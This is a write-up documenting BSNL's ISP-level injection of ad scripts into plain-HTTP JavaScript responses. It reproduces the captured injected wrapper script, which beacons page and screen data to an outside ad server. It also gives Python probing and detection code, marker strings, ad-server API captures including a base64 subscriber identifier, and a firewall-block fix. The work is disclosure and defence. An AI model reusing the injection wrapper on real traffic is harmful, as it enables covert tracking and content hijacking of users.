BSNL Ad Injection Documentation:

Between the USER and the ISP (BSNL), when browsing any unsecured website (plain HTTP), if that site loads a JS file from another unsecured (HTTP) source, the script request carries an HTTP 'Referer' header pointing at the page. The ISP monitors these requests, hijacks the request and sends its own script in place of the one the browser asked for. Being in the path, it can only do this to plaintext HTTP; a script fetched over HTTPS cannot be rewritten this way.
Example request:

GET /wp-includes/js/wp-emoji-release.min.js?ver=5.0.4 HTTP/1.1
Host: planetgoahomes.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://planetgoahomes.in/properties-to-sell/
Connection: keep-alive
Cookie: pum-2844=true; pvc_visits[0]=1553233919b610a1553234126b1003

Hijacked response (a minified wrapper script, returned instead of wp-emoji-release.min.js):

!function(){var a="/wp-includes/js/wp-emoji-release.min.js?ver=5.0.4",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l="117.254.84.212:3000/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fwp-includes%2Fjs%2Fwp-emoji-release.min.js%3Fver%3D5.0.4%22%2C%22referer%22:%22http:%2F%2Fplanetgoahomes.in%2Fproperties-to-sell%2F%22%2C%22host%22:%22planetgoahomes.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:8%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}}catch(a){}}();
Once a hijack has happened for a given request, the injection is paused for 65 seconds to reduce suspicion: if the same request is repeated within 65 s, you receive the expected (genuine) response.

Also, the hijacked response headers differ noticeably from the original ones; in particular the Content-Type is application/x-javascript instead of the origin's text/javascript. This comparison depends on what the origin really serves, so establish the genuine Content-Type first (a repeat fetch within 65 s, or a fetch over HTTPS, returns the real headers) before relying on it as a detection rule.
Code to test the interval [Python]:

```python
import socket
import time


def getD():
    """Request one script over plain HTTP on a raw socket, mimicking a browser
    (the Referer header is what triggers the injection), and return the whole
    raw response (headers + body)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("www-personal.umich.edu", 80))
    msg = b'GET /~bazald/l/api/dynsections.js HTTP/1.1\r\n'
    msg += b'Host: www-personal.umich.edu\r\n'
    msg += b'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\n'
    msg += b'Accept: */*\r\n'
    msg += b'Accept-Language: en-US,en;q=0.5\r\n'
    msg += b'Accept-Encoding: gzip, deflate\r\n'
    msg += b'Referer: http://www-personal.umich.edu/~bazald/l/api/_s_d_l__main_8h_source.html\r\n'
    msg += b'Connection: Close\r\n'  # server closes after the reply, so recv() returning b'' marks the end
    msg += b'Cookie: BIGipServer~WEBHOSTING-PROD-MACC~WWW_PERSONAL_HTTP=2483540877.20480.0000\r\n'
    msg += b'\r\n'
    s.sendall(msg)
    allR = b''
    while True:
        chunk = s.recv(4096)
        if chunk == b'':
            s.close()
            break
        allR += chunk
    return allR


ctr = 0
while True:
    dd = getD()
    # The genuine server answers with text/javascript; the hijacked reply
    # carries application/x-javascript instead.
    if b"Content-Type: text/javascript" in dd:
        ctr += 1
        print('Not Hijacked')
    else:
        print('!!!!Hijacked!!!!')
    # Adjust the sleep period to see changes: >= 65 will always result in a hijacked script
    time.sleep(65)
```
Once the injected wrapper script (the hijacked response above) is executed by the browser, it does two things. First, it re-fetches the original script, appending cb=<timestamp>&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag to its URL and swapping the new <script> in for the one it replaced, so the page still gets its real JS. Second, in the top-level window only and guarded by the window.sarazasaraza flag so it happens once per page, it appends a new async script tag pointing at the ad server.

The injected script tag looks like this (this capture is from a different page: jquery.min.js from ajax.googleapis.com, referred by digg.com):

<script async="" src="//117.254.84.212:3000/getjs?nadipdata="%7B%22url%22:%22%2Fajax%2Flibs%2Fjquery%2F1.8.3%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Fdigg.com%2F%22%2C%22host%22:%22ajax.googleapis.com%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%7D"&screenheight=768&screenwidth=1366&tm=1559199614846&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

The nadipdata value is JSON (percent-encoded and wrapped in literal quotes by JSON.stringify) with the requested URL, the Referer, the host and category/reputation tags, and you can see the screen resolution is sent to the ad server as well.

This script loads a massive 340 KB obfuscated script file, tailored to the subscriber (USER), which includes their subscriber ID and IP address.
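As an added example (not part of the original paste), here is an offline check that goes beyond the Content-Type comparison: it parses a captured raw HTTP response, compares the Content-Type with what the origin is assumed to serve, scans the body for the wrapper's fixed markers (the sarazasaraza globals, the fingerprint tag and the getjs endpoint seen above), and pulls out the ad-server host:port for a blocklist. It also gunzips the body when the server sent Content-Encoding: gzip, since the markers would otherwise be invisible. The two responses it runs on are constructed to mirror the genuine and hijacked replies described above, and the expected Content-Type of text/javascript is an assumption that has to match the real origin.

```python
import gzip
import re

# Fixed strings from the wrapper script shown above; any of them in a reply
# to a script request is a strong signal of the injection.
INJECTION_MARKERS = (
    b"sarazasaraza",                      # global flags the wrapper sets on window
    b"fingerprint=c2VwLW5vLXJlZGlyZWN0",  # constant tag appended to the re-fetch URL
    b"/getjs?nadipdata=",                 # second-stage ad-server endpoint
)
# host:port immediately before /getjs? in the wrapper's beacon URL literal
AD_SERVER_RE = re.compile(rb'"(\d{1,3}(?:\.\d{1,3}){3}:\d{1,5})/getjs\?')


def parse_http_response(raw):
    """Split a raw HTTP/1.x response into (status, headers, body).
    The body is gunzipped when the server said Content-Encoding: gzip."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response: no end of headers")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    if headers.get("content-encoding", "").lower() == "gzip":
        body = gzip.decompress(body)
    return status, headers, body


def classify_response(raw, expected_content_type="text/javascript"):
    """Return the list of reasons the response looks injected; an empty list
    means it looks genuine. expected_content_type must be what the origin
    really serves (assumed here; confirm with a fetch over HTTPS or a repeat
    within 65 s)."""
    status, headers, body = parse_http_response(raw)
    reasons = []
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype != expected_content_type:
        reasons.append("content-type %r, expected %r" % (ctype, expected_content_type))
    for marker in INJECTION_MARKERS:
        if marker in body:
            reasons.append("body contains %r" % marker.decode("ascii"))
    return reasons


def ad_server_from_body(body):
    """Extract the host:port the wrapper beacons to, or None if absent."""
    m = AD_SERVER_RE.search(body)
    return m.group(1).decode("ascii") if m else None


# Constructed samples (not real captures): a genuine reply, a hijacked reply
# keeping only the relevant fragments of the wrapper shown above, and the
# same hijacked reply gzip-encoded.
GENUINE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/javascript\r\n"
    b"Connection: close\r\n\r\n"
    b"/*! wp-emoji */window._wpemojiSettings=window._wpemojiSettings||{};"
)
HIJACKED = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/x-javascript\r\n"
    b"Connection: close\r\n\r\n"
    b'!function(){var a="/wp-includes/js/wp-emoji-release.min.js?ver=5.0.4";'
    b"window.sarazasarazaNoti=new Array;"
    b'var l="117.254.84.212:3000/getjs?nadipdata="+JSON.stringify("%7B%7D")'
    b'+"&fingerprint=c2VwLW5vLXJlZGlyZWN0";}();'
)
HIJACKED_GZIP = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/x-javascript\r\n"
    b"Content-Encoding: gzip\r\n\r\n"
    + gzip.compress(HIJACKED.split(b"\r\n\r\n", 1)[1])
)

if __name__ == "__main__":
    for name, raw in (("genuine", GENUINE), ("hijacked", HIJACKED), ("hijacked+gzip", HIJACKED_GZIP)):
        reasons = classify_response(raw)
        print(name, "->", "looks genuine" if not reasons else "; ".join(reasons))
        print("   ad server:", ad_server_from_body(parse_http_response(raw)[2]))
```

The body markers are the more robust signal: the Content-Type mismatch only holds for origins that serve text/javascript, while the sarazasaraza globals and the fixed fingerprint tag come from the injector itself, and the extracted host:port is exactly the address to put in a firewall rule.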
Apart from port 3000, where it answers plain HTTP, the server is unreachable.

If you open the root page of the ad server (http://117.254.84.212:3000/), it displays the stock Express.js welcome page:
------------------------------------------
Express
Welcome to Express
------------------------------------------
The server exposes an ad API using JSON at http://117.254.84.212:3000/api/getnoti (GET) and http://117.254.84.212:3000/api/logerror (POST), and possibly more endpoints.
Example:

URL: http://117.254.84.212:3000/api/getnoti?tm=1559201611495&subscriberId=c2g4MzIyNDYyMzA1X3djZHJAYnNubC5pbg==&subscriberIP=<Snipped by me>&nadipdata="{\"url\":\"/ajax/libs/jquery/1.8.3/jquery.min.js\",\"referer\":\"http://digg.com/\",\"host\":\"ajax.googleapis.com\",\"categories\":[0],\"reputations\":[1],\"nadipdomain\":1}"&screenheight=768&screenwidth=1366&preadid=-1&cycle=false&_=1559201610551

Note that subscriberId is plain base64 and decodes to an @bsnl.in account identifier, so every ad request is tied to the subscriber's account and not just to the IP; the fingerprint value c2VwLW5vLXJlZGlyZWN0 seen in the wrapper decodes to the string sep-no-redirect; tm and the trailing _ cache-buster are millisecond epoch timestamps.

[GET request]
Host: 117.254.84.212:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://digg.com/
Origin: http://digg.com
Connection: keep-alive

[Response]
{"message":"No Ad available. Error calculatedAd null 3.","error":true}
------------------------------------------
Immediately after, the following request is made, which shows that the ad server logs ad-request failures together with the USER's browser, Referer and IP address:

URL: http://117.254.84.212:3000/api/logerror?tm=1559201611901

[POST request]
Host: 117.254.84.212:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://digg.com/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 378
Origin: http://digg.com
Connection: keep-alive
Cache-Control: max-age=0

[Query string]
tm: 1559201611901

[Form data] (form-encoded; + stands for a space)
error: No data in getnoti
methodName: loadFirstAd: nadipdata: {"message":"No Ad available. Error calculatedAd null 3.","error":true}
params: {"browser":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0","referer":"http://digg.com/","subscriberIP":"<Snipped by me>"}

[Response]
{"message":"Ok"}
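As an added example (not from the original paste), a decoder for the ad server's query strings and for the logerror form body, showing exactly what each beacon carries: the nadipdata JSON (URL, Referer, host, category/reputation tags), the base64 subscriberId, the subscriberIP, the fingerprint, the screen size and the millisecond timestamps. The inputs are constructed from the captures above: the nadipdata value is copied in its percent-encoded wire form from the injected script tag, the subscriberId is a made-up placeholder encoded the same way as the real one (which decodes to an @bsnl.in account identifier), and the IP the author snipped is replaced by the documentation address 203.0.113.7.

```python
import base64
import json
from datetime import datetime, timezone
from urllib.parse import parse_qs, quote, urlsplit


def b64_text(value):
    """Decode standard base64 to text, tolerating stripped '=' padding."""
    return base64.b64decode(value + "=" * (-len(value) % 4)).decode("utf-8")


def decode_nadipdata(value):
    """nadipdata is JSON that the client percent-encoded and then passed through
    JSON.stringify(), so after URL decoding it is still wrapped in quotes."""
    return json.loads(value.strip('"'))


def decode_beacon_url(url):
    """Pull the subscriber-identifying fields out of a getjs or getnoti URL."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)

    def first(key):
        return qs[key][0] if key in qs and qs[key][0] else None

    out = {"endpoint": parts.netloc + parts.path, "nadipdata": None}
    if first("nadipdata"):
        out["nadipdata"] = decode_nadipdata(first("nadipdata"))
    if first("subscriberId"):
        out["subscriber_id"] = b64_text(first("subscriberId"))
    if first("subscriberIP"):
        out["subscriber_ip"] = first("subscriberIP")
    if first("fingerprint"):
        out["fingerprint"] = b64_text(first("fingerprint"))
    if first("tm"):  # millisecond epoch timestamp
        out["time_utc"] = datetime.fromtimestamp(int(first("tm")) / 1000, tz=timezone.utc)
    if first("screenwidth") and first("screenheight"):
        out["screen"] = (int(first("screenwidth")), int(first("screenheight")))
    return out


def decode_logerror_form(body):
    """Parse the x-www-form-urlencoded body of POST /api/logerror; the
    'params' field is itself JSON carrying the subscriber IP."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    form["params"] = json.loads(form.get("params", "{}"))
    return form


# Constructed inputs modelled on the captures above (see the lead-in).
NADIPDATA = ('"%7B%22url%22:%22%2Fajax%2Flibs%2Fjquery%2F1.8.3%2Fjquery.min.js%22%2C'
             '%22referer%22:%22http:%2F%2Fdigg.com%2F%22%2C%22host%22:%22ajax.googleapis.com%22%2C'
             '%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%7D"')
FAKE_SUBSCRIBER_ID = base64.b64encode(b"example-subscriber@bsnl.in").decode("ascii")  # placeholder
GETJS_URL = ("http://117.254.84.212:3000/getjs?nadipdata=" + NADIPDATA +
             "&screenheight=768&screenwidth=1366&tm=1559199614846&lib=true"
             "&fingerprint=c2VwLW5vLXJlZGlyZWN0")
GETNOTI_URL = ("http://117.254.84.212:3000/api/getnoti?tm=1559201611495"
               "&subscriberId=" + quote(FAKE_SUBSCRIBER_ID, safe="") +
               "&subscriberIP=203.0.113.7&nadipdata=" + NADIPDATA +
               "&screenheight=768&screenwidth=1366&preadid=-1&cycle=false&_=1559201610551")
LOGERROR_BODY = ("error=No+data+in+getnoti"
                 "&methodName=loadFirstAd%3A+nadipdata%3A+%7B%22error%22%3Atrue%7D"
                 "&params=%7B%22browser%22%3A%22Mozilla%2F5.0%22%2C%22referer%22%3A"
                 "%22http%3A%2F%2Fdigg.com%2F%22%2C%22subscriberIP%22%3A%22203.0.113.7%22%7D")

if __name__ == "__main__":
    for label, url in (("getjs", GETJS_URL), ("getnoti", GETNOTI_URL)):
        print(label, json.dumps(decode_beacon_url(url), default=str, indent=2))
    print("logerror", json.dumps(decode_logerror_form(LOGERROR_BODY), indent=2))
```

The base64 value is percent-encoded when the constructed URL is built because the base64 alphabet contains + and /, which parse_qs would otherwise turn into a space or misread; the real captures above happen not to contain either character.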
Current solution:

The script hijacking itself cannot be prevented from the client side as long as the page and its scripts are fetched over plain HTTP (the ISP's in-path rewriting only works on plaintext; HTTPS pages are unaffected). The ad injection, however, can be avoided by blocking the IP address 117.254.84.212 with a firewall rule, so the second-stage ad script never loads. The wrapper still runs and re-fetches the original script, so pages keep working; blocking only cuts the beacon to the ad server.